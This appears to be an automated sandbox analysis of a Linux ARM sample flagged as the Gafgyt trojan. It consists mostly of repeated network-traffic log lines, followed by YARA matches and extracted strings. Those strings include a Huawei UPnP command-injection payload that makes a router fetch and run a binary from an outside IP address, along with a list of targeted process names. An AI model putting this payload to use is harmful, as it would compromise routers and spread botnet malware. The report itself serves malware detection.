            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443

            System Summary

            barindex
            Source: skyljne.arm7-20240113-1800.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5421.1.00007f81a4017000.00007f81a4034000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: skyljne.arm7-20240113-1800.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: skyljne.arm7-20240113-1800.elfELF static info symbol of initial sample: __gnu_unwind_execute
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.188 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/wgetcurlbusyboxechocatnano
